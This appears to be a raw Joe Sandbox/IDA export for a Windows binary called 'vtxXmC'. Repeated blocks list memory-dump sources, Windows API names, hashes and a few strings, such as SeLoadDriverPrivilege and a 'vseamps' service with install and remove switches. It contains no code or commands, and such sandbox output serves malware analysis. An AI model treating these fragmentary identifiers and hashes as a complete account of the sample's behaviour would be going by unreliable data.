                          • API String ID: 73155330-0
                          • Opcode ID: c49bc023de0e2a92928f53e7c16b56888227e9b94bcb6080ad38a6f5ea522257
                          • Instruction ID: 8fda1976ad6f55f9a084edc51870c7c4382a086b65423192ea9e7f295f3919bf
                          • Opcode Fuzzy Hash: c49bc023de0e2a92928f53e7c16b56888227e9b94bcb6080ad38a6f5ea522257
                          • Instruction Fuzzy Hash: 47814A6AA186C245E6168F35DC842BDA694EF56BC4F188335EFD973792DF3CE0928300
                          APIs
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2266181560.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 0000000C.00000002.2266166893.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266200767.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266215985.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266231128.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_140000000_vtxXmC.jbxd
                          Similarity
                          • API ID: CriticalSection$EnterLeave$Heap$AllocProcesslstrlen
                          • String ID:
                          • API String ID: 3526400053-0
                          • Opcode ID: 2d7440e75e10ea9e081ba84afc5c3468ce3eac85d6796ce4805a157c9b29c232
                          • Instruction ID: dcb8fc7c666fd7128fde866f0540a8def7dae1288ec2bbf322971b46f3f62141
                          • Opcode Fuzzy Hash: 2d7440e75e10ea9e081ba84afc5c3468ce3eac85d6796ce4805a157c9b29c232
                          • Instruction Fuzzy Hash: E3220F76211B4086E722DF26F840B9933A1F78CBE5F541226EB5A8B7B4DF3AC585C740
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2266181560.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 0000000C.00000002.2266166893.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266200767.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266215985.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266231128.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_140000000_vtxXmC.jbxd
                          Similarity
                          • API ID: CriticalSectionServer$CreateErrorLastProcessTimerTokenWaitable$AdjustCloseContextCurrentDontEnterEventHandleInitializeLeaveListenLookupOpenPrivilegePrivilegesProtseqRegisterSerializeValueVersion
                          • String ID: SeLoadDriverPrivilege$ampStartSingletone: logging started, settins=%s$null
                          • API String ID: 3408796845-4213300970
                          • Opcode ID: 126decfa78297cd7188aa212e183f7007b74f13d5c024852e8adcc4be0567069
                          • Instruction ID: 59d58333609de1a5812b0fd1fbb73637b4596d8d749a2627428b03e5fdfefd81
                          • Opcode Fuzzy Hash: 126decfa78297cd7188aa212e183f7007b74f13d5c024852e8adcc4be0567069
                          • Instruction Fuzzy Hash: B19104B1224A4182EB12CF22F854BC633A5F78C7D4F445229FB9A4B6B4DF7AC159CB44
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2266181560.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 0000000C.00000002.2266166893.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266200767.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266215985.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266231128.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_140000000_vtxXmC.jbxd
                          Similarity
                          • API ID: CriticalSection$CloseHandle$DeleteEnterLeaveServer$CancelEventListeningMgmtObjectSingleStopTerminateThreadTimerUnregisterWaitWaitable
                          • String ID: ampStopSingletone: logging ended
                          • API String ID: 2048888615-3533855269
                          • Opcode ID: 304760f1fd88bc3c97c02eb8ad6caf2cea0e78157ea711a11ae6bb1ec958ebce
                          • Instruction ID: 72436faa0f880f3f140bbf81e9e476d17cd4b789f208762ad84a5967a0be411a
                          • Opcode Fuzzy Hash: 304760f1fd88bc3c97c02eb8ad6caf2cea0e78157ea711a11ae6bb1ec958ebce
                          • Instruction Fuzzy Hash: 85315178221A0192EB17DF27EC94BD82361E79CBE1F455111FB0A4B2B1CF7AC5898744
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2266181560.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 0000000C.00000002.2266166893.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266200767.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266215985.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266231128.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_140000000_vtxXmC.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3eee3a1980859deabbe81d62853d66f73e7f8938a0b91b292409d40ad6238f27
                          • Instruction ID: 939e1951021ac32239a98278383650b1560c4a87fea8e277fdca239b4ddbef52
                          • Opcode Fuzzy Hash: 3eee3a1980859deabbe81d62853d66f73e7f8938a0b91b292409d40ad6238f27
                          • Instruction Fuzzy Hash: 3022CEB2625A8086EB22CF2BF445BEA77A0F78DBC4F444116FB4A476B5DB39C445CB00
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2266181560.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 0000000C.00000002.2266166893.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266200767.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266215985.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266231128.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_140000000_vtxXmC.jbxd
                          Similarity
                          • API ID: ErrorLastManagerOpen$FileModuleName
                          • String ID: /remove$/service$vseamps
                          • API String ID: 67513587-3839141145
                          • Opcode ID: 39fa17c263662ab8de8707f1fae5283c28ed51da3e4186f1b0bc27974e33e859
                          • Instruction ID: ba5f49d8dd96f1c36e401cc1f7cdff7269c229e2e129f463089a9495e32f08e5
                          • Opcode Fuzzy Hash: 39fa17c263662ab8de8707f1fae5283c28ed51da3e4186f1b0bc27974e33e859
                          • Instruction Fuzzy Hash: F031E9B2708B4086EB42DF67B84439AA3A1F78CBD4F480025FF5947B7AEE79C5558704
                          APIs
                          • LoadLibraryA.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F042
                          • GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F05E
                          • GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F086
                          • GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F0A5
                          • GetProcAddress.KERNEL32 ref: 000000014000F0F3
                          • GetProcAddress.KERNEL32 ref: 000000014000F117
                            • Part of subcall function 00000001400073E0: LdrLoadDll.NTDLL ref: 00000001400073E2
                          Strings
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2266181560.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 0000000C.00000002.2266166893.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266200767.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266215985.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266231128.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_140000000_vtxXmC.jbxd
                          Similarity
                          • API ID: AddressProc$Load$Library
                          • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
                          • API String ID: 3981747205-232180764
                          • Opcode ID: a4a8166f7fb3539f2a033069c8db60d0a751c3badd5dc7e485aee673dfe3cd32
                          • Instruction ID: 2f5902004a3f6de811dc5f380475ae1a3efdd32c0186a6d00da0f9ae6c345c7d
                          • Opcode Fuzzy Hash: a4a8166f7fb3539f2a033069c8db60d0a751c3badd5dc7e485aee673dfe3cd32
                          • Instruction Fuzzy Hash: FE515CB561674181FE66EB63B850BFA2290BB8D7D0F484025BF4E4BBB1EF3DC445A210
                          APIs
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2266181560.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 0000000C.00000002.2266166893.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266200767.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266215985.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266231128.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_140000000_vtxXmC.jbxd
                          Similarity
                          • API ID: CreateEvent$Thread$ClientCriticalCurrentImpersonateInitializeOpenRevertSectionSelfToken
                          • String ID:
                          • API String ID: 4284112124-0
                          • Opcode ID: edd1c8558eeb60cdd671b70c13388f4905a0e10de3bd345b1359afa696ffe28d
                          • Instruction ID: d1cc2c0b88e239984ef66edc10b99dba483783d79de04edfe0f0364e5ac1fb7c
                          • Opcode Fuzzy Hash: edd1c8558eeb60cdd671b70c13388f4905a0e10de3bd345b1359afa696ffe28d
                          • Instruction Fuzzy Hash: 65415D72604B408AE351CF66F88479EB7A0F78CB94F508129EB8A47B74CF79D595CB40
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2266181560.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 0000000C.00000002.2266166893.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266200767.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266215985.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266231128.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_140000000_vtxXmC.jbxd
                          Similarity
                          • API ID: Service$CloseHandle$CreateErrorFileLastManagerModuleNameOpen
                          • String ID: vseamps
                          • API String ID: 3693165506-3944098904
                          • Opcode ID: 37866f258d51cd6cd84815c45d3eaefe281d6d9a8e40d6c1e65e6d09f5d7cdba
                          • Instruction ID: 61898eac7960aa5413d410c65d13376abce5a62f28ec8a6c68938921ced9de71
                          • Opcode Fuzzy Hash: 37866f258d51cd6cd84815c45d3eaefe281d6d9a8e40d6c1e65e6d09f5d7cdba
                          • Instruction Fuzzy Hash: F321FCB1204B8086EB56CF66F88439A73A4F78C784F544129E7894B774DF7DC149CB00
                          APIs
                          • GetModuleFileNameA.KERNEL32(?,?,?,00000000,00000001,000000014000961C,?,?,?,?,?,?,0000000140009131,?,?,00000001), ref: 00000001400093CF
                          Strings
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2266181560.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 0000000C.00000002.2266166893.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266200767.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266215985.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266231128.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_140000000_vtxXmC.jbxd
                          Similarity
                          • API ID: FileModuleName
                          • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                          • API String ID: 514040917-4022980321
                          • Opcode ID: 1d01bebd6d090e025827d9f03818fc87fa6a91df27b235dcc59e95ab31d19661
                          • Instruction ID: eb4045a5a240d2828a775daba1198261b01968dd91f8e387fbd6cb4ec0284cf4
                          • Opcode Fuzzy Hash: 1d01bebd6d090e025827d9f03818fc87fa6a91df27b235dcc59e95ab31d19661
                          • Instruction Fuzzy Hash: F851EFB131464042FB26DB2BB851BEA2391A78D7E0F484225BF2947AF2DF39C642C304
                          APIs
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2266181560.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 0000000C.00000002.2266166893.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266200767.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266215985.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266231128.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_140000000_vtxXmC.jbxd
                          Similarity
                          • API ID: String$ByteCharMultiWide$AllocErrorHeapLast
                          • String ID:
                          • API String ID: 2057259594-0
                          • Opcode ID: d3ef643e943a21760fc28678b116a7f08da1d9f04a09311d9013e3bfd6c4d4e3
                          • Instruction ID: f9b9a5bb90e2e08b647a9eb75fc4ff4e18af91537db3c322e1916602633d995e
                          • Opcode Fuzzy Hash: d3ef643e943a21760fc28678b116a7f08da1d9f04a09311d9013e3bfd6c4d4e3
                          • Instruction Fuzzy Hash: B6A16AB22046808AEB66DF27E8407EA77E5F74CBE8F144625FB6947BE4DB78C5408700
                          APIs
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2266181560.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 0000000C.00000002.2266166893.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266200767.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266215985.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266231128.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_140000000_vtxXmC.jbxd
                          Similarity
                          • API ID: Heap$Process$Free$AllocInfoStartupVersion
                          • String ID:
                          • API String ID: 3103264659-0
                          • Opcode ID: b926c3abaa2c479ec326760b90e5a1fd11221ebaffc6337adf83b77cd4a46ae1
                          • Instruction ID: 8fdcf1cc106887877eb8bf0912cd84dfc65bead55acac366e092854278e1a3ce
                          • Opcode Fuzzy Hash: b926c3abaa2c479ec326760b90e5a1fd11221ebaffc6337adf83b77cd4a46ae1
                          • Instruction Fuzzy Hash: 0F7167B1604A418AF767EBA3B8557EA2291BB8D7C5F084039FB45472F2EF39C440C741
                          APIs
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2266264014.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                          • Associated: 0000000C.00000002.2266247516.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000C.00000002.2266285614.00007FFB23B12000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000C.00000002.2266327700.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000C.00000002.2266343032.00007FFB23B1F000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_7ffb23b00000_vtxXmC.jbxd
                          Similarity
                          • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                          • String ID:
                          • API String ID: 3140674995-0
                          • Opcode ID: 710f6283529bc39a5878960356047a6e461f095b9b13c17159f2665477d47395
                          • Instruction ID: 274ec6201cabdce5605224432e618fbe3bc74b4e7e456fbef5793b002dbf2ad5
                          • Opcode Fuzzy Hash: 710f6283529bc39a5878960356047a6e461f095b9b13c17159f2665477d47395
                          • Instruction Fuzzy Hash: 0F313EB6A19BC18AEB618F60EC883ED7361FB44744F48413ADA8E57B94DF38D548CB10
                          APIs
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2266181560.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 0000000C.00000002.2266166893.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266200767.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266215985.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266231128.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_140000000_vtxXmC.jbxd
                          Similarity
                          • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerPresentTerminate
                          • String ID:
                          • API String ID: 1269745586-0
                          • Opcode ID: 971e421c69f8e6a9c7be80a9fd1684b11f1d9217f6c56614116cebe2abaa4248
                          • Instruction ID: e2ab3ef72b7f240c54b21dbf897bf6525f512fe4427dd1c0d247b710ac710d4c
                          • Opcode Fuzzy Hash: 971e421c69f8e6a9c7be80a9fd1684b11f1d9217f6c56614116cebe2abaa4248
                          • Instruction Fuzzy Hash: 53115972608B8186D7129F62F8407CE77B0FB89B91F854122EB8A43765EF3DC845CB00
                          APIs
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2266264014.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                          • Associated: 0000000C.00000002.2266247516.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000C.00000002.2266285614.00007FFB23B12000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000C.00000002.2266327700.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000C.00000002.2266343032.00007FFB23B1F000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_7ffb23b00000_vtxXmC.jbxd
                          Similarity
                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                          • String ID:
                          • API String ID: 1239891234-0
                          • Opcode ID: 5eef0cc7783b0be87f0727cc0123e63361c6ac4350bb89c20972030a757485fe
                          • Instruction ID: 56505e40301d2caaa35ed5a48393f25abd5960e1a323e7dea075dab34068c172
                          • Opcode Fuzzy Hash: 5eef0cc7783b0be87f0727cc0123e63361c6ac4350bb89c20972030a757485fe
                          • Instruction Fuzzy Hash: 97315C7AA18BC185DB61CF35E8883AE63A4FB84754F580175EACD57B55DF38C145CB00
                          APIs
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2266181560.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 0000000C.00000002.2266166893.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266200767.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266215985.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266231128.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_140000000_vtxXmC.jbxd
                          Similarity
                          • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                          • String ID:
                          • API String ID: 1445889803-0
                          • Opcode ID: 348833bf0fd47251ec8459b694c57c39dac6eb63685dc4ebaa15df7501b8973f
                          • Instruction ID: 72e860a1e5610cf2f60718b33953b9e9cfa3de8eae9ff42976e828aecb981d5d
                          • Opcode Fuzzy Hash: 348833bf0fd47251ec8459b694c57c39dac6eb63685dc4ebaa15df7501b8973f
                          • Instruction Fuzzy Hash: 4101F775255B4082EB928F26F9403957360F74EBA0F456220FFAE4B7B4DA3DCA958700
                          APIs
                          • GetProcessHeap.KERNEL32(?,?,?,00000001400047BB,?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 00000001400046B0
                          • HeapReAlloc.KERNEL32(?,?,?,00000001400047BB,?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 00000001400046C1
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2266181560.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 0000000C.00000002.2266166893.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266200767.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266215985.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266231128.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_140000000_vtxXmC.jbxd
                          Similarity
                          • API ID: Heap$AllocProcess
                          • String ID:
                          • API String ID: 1617791916-0
                          • Opcode ID: e1b55434e6231e5ce6780f684ad3576ffb26ff33b9fae7a8d56a49fd816118fb
                          • Instruction ID: 02c5a1d02253778f48d8bcd65850d79aa5baad65f26a42f950a3123f4edab52d
                          • Opcode Fuzzy Hash: e1b55434e6231e5ce6780f684ad3576ffb26ff33b9fae7a8d56a49fd816118fb
                          • Instruction Fuzzy Hash: CB31D1B2715A8082EB06CF57F44039863A0F74DBC4F584025EF5D57B69EB39C8A28704
                          APIs
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2266181560.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 0000000C.00000002.2266166893.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266200767.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266215985.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266231128.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_140000000_vtxXmC.jbxd
                          Similarity
                          • API ID: ExceptionFilterUnhandled$CaptureContext
                          • String ID:
                          • API String ID: 2202868296-0
                          • Opcode ID: 905f91afdcc57dbacad6504ae7f65679640b92e152865c9b61e81d303733290d
                          • Instruction ID: a6869a7b9d4117274e99734abe304e52ce4a6a571683f9898e15e7d65764808a
                          • Opcode Fuzzy Hash: 905f91afdcc57dbacad6504ae7f65679640b92e152865c9b61e81d303733290d
                          • Instruction Fuzzy Hash: 44014C31218A8482E7269B62F4543DA62A0FBCD385F440129B78E0B6F6DF3DC544CB01
                          APIs
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2266264014.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                          • Associated: 0000000C.00000002.2266247516.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000C.00000002.2266285614.00007FFB23B12000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000C.00000002.2266327700.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000C.00000002.2266343032.00007FFB23B1F000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_7ffb23b00000_vtxXmC.jbxd
                          Similarity
                          • API ID: ExceptionRaise_clrfp
                          • String ID:
                          • API String ID: 15204871-0
                          • Opcode ID: 242015c6cea6594ab8d644b6eea7da2ef8062d64434110bbd4fb3fd5cf8f1a15
                          • Instruction ID: d0b300e719b5d8750f6b1ae6f89fa2e10ec81cdb993b21d71de82238eb0c47fc
                          • Opcode Fuzzy Hash: 242015c6cea6594ab8d644b6eea7da2ef8062d64434110bbd4fb3fd5cf8f1a15
                          • Instruction Fuzzy Hash: 61B14EB7604B898BE716CF39C88936C77A0F784B48F188961DADD977A8CB39D451C700
                          APIs
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2266181560.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 0000000C.00000002.2266166893.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266200767.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266215985.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266231128.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_140000000_vtxXmC.jbxd
                          Similarity
                          • API ID: ByteCharErrorLastMultiWide
                          • String ID:
                          • API String ID: 203985260-0
                          • Opcode ID: 52eb8cb33472843dab3d23723d723ebc9e780f32240a0bf22a1f45fa5c529dea
                          • Instruction ID: 2a1840496c7657cf23b6901bcaaf21815035fe120b0a860a82176d8039cbaff9
                          • Opcode Fuzzy Hash: 52eb8cb33472843dab3d23723d723ebc9e780f32240a0bf22a1f45fa5c529dea
                          • Instruction Fuzzy Hash: C871DF72A04AA086F7A3DF12E441BDA72A1F78CBD4F148121FF880B7A5DB798851CB10
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2266181560.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 0000000C.00000002.2266166893.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266200767.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266215985.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266231128.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_140000000_vtxXmC.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a23616b521790ba98c8a4ca650accd459689c226ef9c151115ac5421c5afe981
                          • Instruction ID: 31705e6bd3fe747407dbe92e60a9b5f63bdbefd7c066999fadf2412e4a74ef82
                          • Opcode Fuzzy Hash: a23616b521790ba98c8a4ca650accd459689c226ef9c151115ac5421c5afe981
                          • Instruction Fuzzy Hash: BD312B3260066442F723AF77F845BDE7651AB987E0F254224BB690B7F2CFB9C4418300
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2266264014.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                          • Associated: 0000000C.00000002.2266247516.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000C.00000002.2266285614.00007FFB23B12000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000C.00000002.2266327700.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000C.00000002.2266343032.00007FFB23B1F000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_7ffb23b00000_vtxXmC.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4a2880f174246bb62df44fff46a4d3d73a1dc8eca39573d4fb70521656c567db
                          • Instruction ID: 55463b919ea3a52b6a977644f00d31b98771744184d6bf951d94a701353682fb
                          • Opcode Fuzzy Hash: 4a2880f174246bb62df44fff46a4d3d73a1dc8eca39573d4fb70521656c567db
                          • Instruction Fuzzy Hash: CE51F4A6B086C185FB21DF72EC881AE7BA4BB45B94F184574EE9D37A99CE3CD001C700
                          APIs
                          Memory Dump Source
